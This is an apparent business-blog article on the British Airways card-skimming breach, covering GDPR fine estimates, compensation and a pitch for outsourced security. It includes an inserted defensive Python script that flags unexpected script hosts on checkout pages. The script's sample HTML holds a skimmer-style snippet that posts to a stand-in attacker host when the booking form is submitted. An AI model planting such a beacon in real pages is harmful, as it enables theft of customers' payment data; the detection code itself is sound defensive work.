Why British Airways’ data breach could cost the business over £1 billion

British Airways is the latest business to disclose a large data breach, informing 380,000 customers on Thursday that their credit card details had been stolen. The credit card information included card numbers, expiry dates and security codes.

In addition to credit card information, it’s thought that hackers also gained access to names, email and home addresses. Unlike a number of recent data breaches, the customers affected are those who booked via the BA website or app in a short 15-day window, meaning the details stolen were those entered by paying customers in that timeframe rather than saved data.

British Airways has called the act “data theft” rather than a data breach and stated that it was a “very sophisticated, malicious criminal attack on our website”. It’s important to note, however, that this “data theft” technically qualifies as a data breach as confidential information was released to an untrusted environment.

Today, it has been revealed that a skimming tool was added to the British Airways website, with experts stating it is similar to the malware that caused the Ticketmaster breach through its third-party live chat add-on. The tool scrapes credentials entered into the online booking form, sending them to the hackers’ server when the booking form is submitted.
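One defender-side check that follows from the skimmer description above, added here as an example and not code from the original article or from British Airways: a static audit of a checkout page's script tags against an allowlist of hosts, flagging external scripts loaded from elsewhere and inline scripts that reference foreign hosts. The sample page, host names and allowlist are all constructed for the example.

```python
"""Static audit of a booking/checkout page for unexpected script sources."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


URL_RE = re.compile(r"https?://[^\s'\"()]+")


def audit_page(html, allowed_hosts):
    """Return (kind, host) findings for scripts loaded from, or inline scripts
    mentioning, hosts outside the allowlist. Relative URLs count as same-origin."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("external-script", host))
    for body in collector.inline:
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname
            if host and host not in allowed_hosts:
                findings.append(("inline-script-url", host))
    return findings


# Constructed sample page: one first-party script, one unexpected third-party
# script, and an inline snippet that posts to an unknown host on form submit.
SAMPLE_HTML = """<html><head>
<script src="https://static.example-airline.test/app.js"></script>
<script src="https://cdn.example-third-party.test/chat.js"></script>
<script>
  /* constructed inline snippet for the detector to flag */
  document.forms[0].addEventListener("submit", function () {
    fetch("https://collector.example-bad.test/s", {method: "POST"});
  });
</script>
</head><body><form id="booking"><input name="card"></form></body></html>"""
ALLOWED_HOSTS = {"www.example-airline.test", "static.example-airline.test"}
```

Run `audit_page(SAMPLE_HTML, ALLOWED_HOSTS)` against a saved copy of the live page on a schedule and alert on any finding that differs from the last approved baseline.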

BA’s plan to improve its cyber security

What’s particularly interesting about this case is that British Airways had been on the verge of appointing an outsourced provider to look after its IT security. According to a leaked internal memo from BA’s Group IT Service Effectiveness Manager, “internal and external reports undertaken highlight that further investment is required in cyber security across IAG to provide a group-wide strategic and proactive approach.”

There are many reasons why outsourced IT security is the smart solution for businesses looking not only to comply with legislation like GDPR, but to follow best practice and keep their data safe and their systems up and running. Not only will businesses have access to a wider pool of cyber security experts than they would hiring in-house, they’ll also be able to focus on growth unencumbered by costly in-house engineers. What’s more, you can tap into the expertise of your external security partner to understand how your employees can be vigilant in the face of an ever-increasing cyberthreat landscape.

It’s clear that BA identified the need to bolster its cyber security, but it might be a case of too little, too late. A number of outlets are reporting that BA could face a steep penalty from the Information Commissioner’s Office (ICO), the governing body responsible for regulating compliance with GDPR; The Times reports that the fine could be around £500 million.

The potential cost to British Airways

BA could be fined under GDPR for failing to put in place “reasonable measures” to protect this sensitive information from being leaked; its internal investigations found that the business’s cyber security practices were lacking, but the company didn’t implement its fix – outsourced cyber security – in time for GDPR.

The company has complied with the reporting requirements of GDPR by reporting the breach not only to the relevant authorities, including the ICO, but by contacting its affected customers. The company has issued guidance for those affected, including a warning of phishing attacks off the back of the breach. In the wake of the cyber-attack, BA has advised that fraudsters are likely to get in touch with affected customers purporting to be British Airways in an attempt to gather more personal information.

BA’s history with IT failures

This isn’t the first time British Airways has been caught out due to its reportedly poor IT practices. Last year, an IT shutdown affected 75,000 customers through flight cancellations and disrupted customer services. The company had to pay out an estimated £100 million in compensation, something that’s likely to happen this time around too. In addition to reimbursing any customers whose cards have been successfully used by fraudsters, BA could be liable to pay every affected customer, even those whose details haven’t been fraudulently used, non-material damages of £1,250 each; that amounts to £475 million according to law firm SPG.

One thing BA got right was its reporting. The hack was disclosed to both the relevant authorities and affected customers within about 24 hours of discovery – well within the 72-hour deadline specified by the ICO. Failure to do so will result in a fine of 2% of global annual turnover. Businesses should take heed of this and ensure that any breaches are reported promptly; failure to comply with this key regulation could carry a higher penalty than experiencing a breach itself, provided the business took measures to protect its data.

How can I protect my business?

With all that in mind, it looks like this could be an incredibly expensive data breach for British Airways. It looks like the company had identified the need to improve its IT security, but wasn’t suitably prepared for the GDPR deadline. Whilst the forthcoming plan to outsource its cyber security functions – which is a smart move that would save money and ensure the business had access to the best in the business – was in the works, it wasn’t implemented quickly enough.

That doesn’t mean it’s too late if your business hasn’t yet undertaken an exercise to identify weak points in its IT security. However, this example should illustrate how important it is that your business complies with GDPR. The message to heed is that doing something is better than doing nothing. The ICO has handed out a number of fines in the hundreds of thousands since the GDPR deadline, but if the reports are right, this could be the biggest post-GDPR fine handed out yet.